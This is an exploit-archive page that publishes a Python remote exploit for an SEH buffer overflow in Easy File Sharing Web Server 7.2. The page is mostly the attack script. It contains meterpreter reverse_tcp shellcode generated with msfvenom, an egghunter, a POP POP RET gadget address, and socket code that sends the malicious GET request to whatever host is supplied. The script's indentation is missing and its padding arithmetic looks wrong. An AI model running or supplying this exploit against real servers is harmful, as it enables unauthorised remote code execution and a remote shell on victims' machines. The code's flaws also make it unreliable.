Easy File Sharing Web Server 7.2 SEH Buffer Overflow

Published
Credit
Risk
2016.09.03
Iran Cyber Security Group
High
CWE
CVE
Local
Remote
CWE-119
N/A
No
Yes

#!/usr/bin/python

# Exploit Title: Easy File Sharing Web Server 7.2 SEH Buffer Overflow (EggHunter)
# Date: 2016/8/31
# Exploit Author: Iran Cyber Security Group
# Vendor Homepage: http://www.sharing-file.com
# Software Link: http://www.sharing-file.com/efssetup.exe
# Version: 7.2 [LATEST]
# Tested on: Microsoft Windows 7 Professional x86 [Should Work On The Other Operating Systems]
# CVE : N/A
# Usage : python exploit.py [IP or Domain]

# Discovered By Arash Khazaei (AKA XoDiAK)
# Greetz To Iran Cyber Members & My Friends

import sys,socket
from struct import pack

HOST = sys.argv[1]
PORT = 80
# msfvenom -p windows/meterpreter/reverse_tcp -b '\x2f\x5c' -i 2 -f c 335 Byte
# Replace It With Your Own Shellcode !

shellcode = ("w00tw00t" + "\xd9\xc9\xbf\x35\xfe\x35\x6e\xd9\x74\x24\xf4\x5e\x29\xc9\xb1"
"\x4e\x31\x7e\x17\x83\xc6\x04\x03\x4b\xed\xd7\x9b\x6a\xff\xc1"
"\x10\xa8\xf4\xa8\xf1\x79\x4b\x8d\xf4\xcf\x36\xbf\xbe\x1e\x4d"
"\xd8\x43\x1a\xa9\x5b\x81\x1f\xdd\x18\x78\xb2\x84\x32\xfb\x61"
"\x03\x6f\x9e\xe5\x0f\x3d\x70\x9b\xbb\xd1\x2e\x81\x1c\xa6\x79"
"\x74\x27\x17\xde\x04\x4b\x10\x89\x6b\xd3\xe4\xc0\x6c\x47\x32"
"\xf4\x44\xeb\x7e\x1e\xd7\x62\x4c\x56\x0f\x58\x2e\x1a\x12\xc9"
"\x0e\x12\x81\x30\xc9\x30\x3c\x76\xc0\x7a\xc0\xe0\x3b\xba\x6f"
"\xfc\x5b\xe3\x3f\x1c\xa6\x37\x3d\xf5\x6b\xf3\x1a\xe0\x82\x85"
"\xc8\xee\xce\xc8\xa2\xf9\x0e\x84\xe3\xac\x36\xe6\x3b\xc0\xe7"
"\x61\xc1\xd3\xef\xf1\x4e\xc3\xde\xfd\xc7\x77\x5b\x51\xbc\xab"
"\x2d\xb9\x65\x03\xc1\x01\x47\xbe\x50\xe2\xfc\x96\x96\xab\xd3"
"\xf8\x53\x15\x69\xc6\xcd\x34\xdb\xd3\xcd\xcc\xdd\x02\x24\x31"
"\x9f\xc0\xce\x41\x53\xf0\xe0\xb1\xd7\x96\xfc\x16\xe4\x10\xba"
"\xd0\xd0\x10\x02\x40\xdc\x33\x9d\xb5\x35\xbb\x3f\x4f\x93\x11"
"\x9a\x16\x63\x1b\x60\xa1\xab\x5e\x05\xf2\x7c\x02\x57\x99\x90"
"\x88\x4d\xcf\x60\x3a\x9f\x77\x8a\x9e\xff\x1c\x91\x61\xec\x5e"
"\xd4\x08\x54\x76\xfb\xdb\x45\xda\x8f\x01\xba\xed\x01\xef\x09"
"\xc1\x5d\x8f\x2b\x24\x69\xc0\xbf\x44\x03\x6e\x62\x7c\x39\x6a"
"\xab\x18\x70\xe5\xff\xe6\x33\x3b\x2b\x37\xf1\xb3\x92\xd6\x59"
"\xcc\xc8\xca\x8d\x9d\x34\xf9\x89\xf7\x26\xbc\x60\xa1\xdf\xcb"
"\xa8\x9d\xd2\x9f\x33\x5a\x48\xb2\x8d\xc5\xaa\x9f\x3c\x37\x0b"
"\x98\x35\x70\x3b\xe0")


# Padding !
junk = "A" * 4061
# Next SEH
nseh = "\xeb\x06\x90\x90"

# 0x1000108b [ImageLoader.dll] POP POP RET
seh = pack('<L', 0x10018848)

# Egg Hunter 32 Byte Tag = w00tw00t
egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")

exploit = junk + nseh + seh + egghunter + shellcode + "\x90"*(len(junk)-4-4-32-8-335-5000)
try:
s = socket.socket()
s.connect((HOST, PORT))
s.send("GET " + exploit + " HTTP/1.0\r\n\r\n")
s.close()
except:
print "Can't Connect To Web Server ! Is it up ?"
print "Evil Buffer Sended Successfully!"


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com